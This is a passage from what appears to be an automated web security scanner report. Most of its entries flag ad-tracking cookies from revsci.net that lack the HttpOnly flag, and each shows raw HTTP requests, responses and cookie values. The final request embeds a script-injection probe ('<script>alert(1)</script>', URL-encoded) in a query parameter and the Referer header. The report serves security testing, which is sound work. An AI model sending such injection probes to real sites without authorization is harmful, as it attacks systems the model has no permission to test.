/udRKxiD7cqdKEdcnvdWzB7mitPNgpAakxVxzxuFoNTYIvQkR7MNR/FmP1R9UEsEFfoclXtSQV1O+5D6jdv0llzcubEY4LQLZjAYScdrVDaE0kU1Nqmr4JwjLTRAuTAAn81nt+m5SaFdt2R/lvVk385fRZsMVoL547C76ySK9QGYIrIllyaWvYj901wwTsF6NsqyMA7GQF9Dv0YnpXgyws1hcluxywUPcQMMBqQPokkLOCdoNsQ4sU8wXDnm6sQTaPPZYU7xhV84BsqqNd4sw6PPEblBfop16oBeTlEDYr4I+5vjI6SJq9B+4ex4KLABvrR1I3XSKHPCHzW+edhsiTVkENFbUGdPxJ5PIajmY4N/uNALp+PtABTXhv/qBvdvlF/PgMYLtRX7w2VPJUb3lAY2m3TQPBIhaFN7wj2Cd3qLge5SlG0QqWlm5k1TNMYB37fQyPEr+ykPVkesKPa8MGpMvLF0i80dprDp5LIIgDblp8NYxItWiihsCOgRnjGvsl6yXHcw93FKMGq/QUWnQcLAuWAmp5TSa/VSu/65JJqobDolPkwc1sh2OwiIaGUdhjuJDSwB6t+8iN/wKcdYJxNknyMfkFp09wMyEsrb+MWEOymzDAZYkmrrXzhYgMEtf+5JmuSI6kx1bHRNDWZxIQ7KbXVF/gshYn7HGJewR9hhLhOFlhj8BncLYuHq7ll+PmcOA; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:04 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:03 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

14.107. http://pix04.revsci.net/H07707/b3/0/3/0806180/293330189.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/293330189.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/293330189.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fonex-sells-husky-international-for-2-1-billion%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/onex-sells-husky-international-for-2-1-billion/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_7N2M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=...[SNIP]...; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:01 GMT; Path=/
Set-Cookie: rtc_kcMU=...[SNIP]...; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:01 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:40:01 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

14.108. http://pix04.revsci.net/H07707/b3/0/3/0806180/396037982.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/396037982.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/396037982.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F06%252Fhow-well-did-warner-musics-investors-do%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/how-well-did-warner-musics-investors-do/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_TX1Q=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=...[SNIP]...; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:18 GMT; Path=/
Set-Cookie: rtc_4K_j=...[SNIP]...; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:18 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:17 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

14.109. http://pix04.revsci.net/H07707/b3/0/3/0806180/513736918.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/513736918.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/513736918.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F12%252Ftakeda-in-talks-to-buy-nycomed-for-up-to-14-billion%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/venture-capital/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_rbW-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=...[SNIP]...; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:27:47 GMT; Path=/
Set-Cookie: rtc_bwZ4=...[SNIP]...; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:27:47 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:27:47 GMT
Content-Length: 1029

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_11017','H07707_11018','H07707_10678','H07707_11020','H07707_11028','H07707_11029','
...[SNIP]...

14.110. http://pix04.revsci.net/H07707/b3/0/3/0806180/551354059.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/551354059.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/551354059.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fforstmann-is-said-to-be-undergoing-treatment-for-brain-cancer%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_vhGG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_255o=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=...[SNIP]...; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:29 GMT; Path=/
Set-Cookie: rtc_uvoL=...[SNIP]...; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:29 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:29 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

14.111. http://pix04.revsci.net/H07707/b3/0/3/0806180/562084143.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/562084143.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/562084143.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fcerberus-and-partner-acquire-innkeepers-hotels%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/cerberus-and-partner-acquire-innkeepers-hotels/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_TX1Q=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5BAFiE2lu64fTXbwk32ILzQmufPZU63k5HlskvBlDss6IgvkSQstmQwrMQ3yY/VQb+XpGRPtPdF/P3xDi+xs9p2qFQoXaeUwOOegZxQVZYR2KCkQqCbRlwQpf87la8qMfa2fdzFQ0TyNPZLi+zmYamHuHrQfTLzzkmjbvQ4A1+qkvMUp1Q8EPIZHldrm7RX7vjzPS1hCgtBdKFT5yakB0dwEt8yy1Wy8MVYkqR3iNIjv9dBsXUpcWMrfdHafcSkz+Wc3n68tYm8zJOmCw5FgYtyhlsT30uqmQiAFF42QL7KFHW412CHpL2aQjBxEgqCMdlYnfIY/OvpEUJUEV+JwGyfUWwQJhoZ+LV5H5Od9QuH0RMsKPSeiYAFgLiciPP+HwMadiS218pIt9CDWHegko8z2NSaN8GLhXO7ZzMVTiLefN4oTccmbii8yd2ZE2dbvSQXV5HVasLLo7CabTqrU8Ftt4qPv9FgA6uVTq+DODKbhGtVKmQi8wa6soY1r8Gg1W/vbUnWhE1n0dL4+YaWZYwVgvqX4ReujuW9NpBoIOuEXclBxJGfae76mOLOhi7XB4fjMZPkXl5go/G8u2UIN6VieY6icniHpCBoG6ELfYnMSc9Qpn32GIGUS+VxTA+ZmEONEQUlCRXtJWGbSYBO3VHGdEraMclrTrPJ6SN++HietQ/6TXz3K50jGSB67S4UU+fu9My+1quNVNKXnMd4QCb7ZolUExqxCFzEvRTFjuCyf64MM3YX70AFru9LIo/V1CnNxecZnIVwAXILRiR1yiBaDruJvB3KzHQ==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:13 GMT; Path=/
Set-Cookie: rtc_kb6R=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:13 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:13 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

14.112. http://pix04.revsci.net/H07707/b3/0/3/0806180/579814010.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/579814010.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/579814010.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=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; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPFOEmBLwIQV+kbw/biG3iKgsa+kLk8D0ZkZeJ97Z/AoU7LFBrME41XvQUP/qg8DMnGZ9C924yoDFHB0JPh0+GLgRF8nfUqsG9IpS7I04mBNjPpQxPhVnicg4juBqIHBbyVzgakza9kMFPER9hUo+C303qHidIn2esoGFDfLFaKdyQuehDDUl4/raNV+U2czlEXgK7yGgmfEBZnc1wnbPIMt8S/bLxrtq7e+o2EMiQ0n9f5GuR+E192nuAFLhbgBqWf2xg3; rtc_OkLn=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E7r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHIDf6o

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_OkLn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNOE/FLgIMlrE7uk0efC2MxeQiIW9f4qMA3RvoIdAx3izt0WEHmQdVL0j8gwBbwYN+xoekJT0casdPYJmCnQf6nzyeTtOvbH9yibYGuaoKzy1uAlD/7oqW6csKFkxmhZaFl+jQTmZPk9GgPR9KPyda9+JvYBz/YEF3KohORRwuZK9AfFV8ozq0Uxu091hAQBZa9/Uo5+t4x1b1kdwS1q8wH7uVyQVsOiVrGSktCzfSJjwJUPNCskC+TFybfXv0; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:29:18 GMT; Path=/
Set-Cookie: rtc_61Wz=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Ejr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCANLv6T; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:29:18 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:29:17 GMT
Content-Length: 1149

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_10950','H07707_10954','H07707_10987','H07707_11017','H07707_11018','H07707_10678','
...[SNIP]...

14.113. http://pix04.revsci.net/H07707/b3/0/3/0806180/590965522.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/590965522.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/590965522.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F09%252Flinkedin-on-track-to-raise-274-million-with-ipo%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=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; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPNOEPB7nMMVp94u+yf1fTHFbylf3xSUCqJEEpv7LJlsjeftNd84I1oDZUZb5s27D2NJeZFLT6oXpt5CdiNqhnlw6eTql12Ct5+Oz6IeSkY982gI6j53rDQzcuqBf6kPQdewU4q16oSlJFrIakI2hzJAfgXe29x5XkG204nL/YwlM2S9arSbEJumSD5+DO7Yrw4YrZT9Vx1PbHmVtjWc3BhjZkHqNNtsGgFH+DLaC/r8YaJFy/Cfwl8hJitFEs=; rtc_jd7T=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Err//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCC+G/59

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_jd7T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOEOhLgIQF/Ubw+6yiFgTmgYBdHsoJiWBBGBKsZM+kKb4NfzIzHN3SvzuFM7006496nYKZH0mewDwK4ZCtLhZXv/YmkG2JIDYc5RsuanPlKJnMTbfNOG8YkPsOtQtNuOpcPqOxFvSJgEUWankYFT2Yl9LQnW3TL6UALkyQtEqFGcKcNskrzJcBYSe/+A4gtAzKS/lFfknOREWCvgghmsmmU2RiSJrCml7kKegC4UNNRUpLiLgNEugSSIf9TomIrj+ABg1; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:20 GMT; Path=/
Set-Cookie: rtc_D0S9=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E7r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHIDf6o; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:20 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:28:19 GMT
Content-Length: 1149

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_10950','H07707_10954','H07707_10987','H07707_11017','H07707_11018','H07707_10678','
...[SNIP]...

14.114. http://pix04.revsci.net/H07707/b3/0/3/0806180/702365539.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/702365539.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/702365539.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topicse7f31%252522%25253E%25253Cscript%25253Ealert(1)%25253C%252Fscript%25253Ed4e86dd7255%252Fmergers-acquisitions%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F1%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPNO0PF7nMYVY1Juswpg79QalFC5KCa4WX08GFNFNHV+Jbjo+n86Xli3TAlZ7sPSls+pOPn4ipzRWXtum8RaOGY6IdTfa6uoM2RcyTMRJCBbs3UiF3/XgTzeleJ3tyv0bfJW7avQEA1cAleJYg/jUnqp62rgNlrlHK8V4f2G1n452bFHxwtTw/RbfPeaybhywI7lpKJyBxqoc6JAgR4scwc; 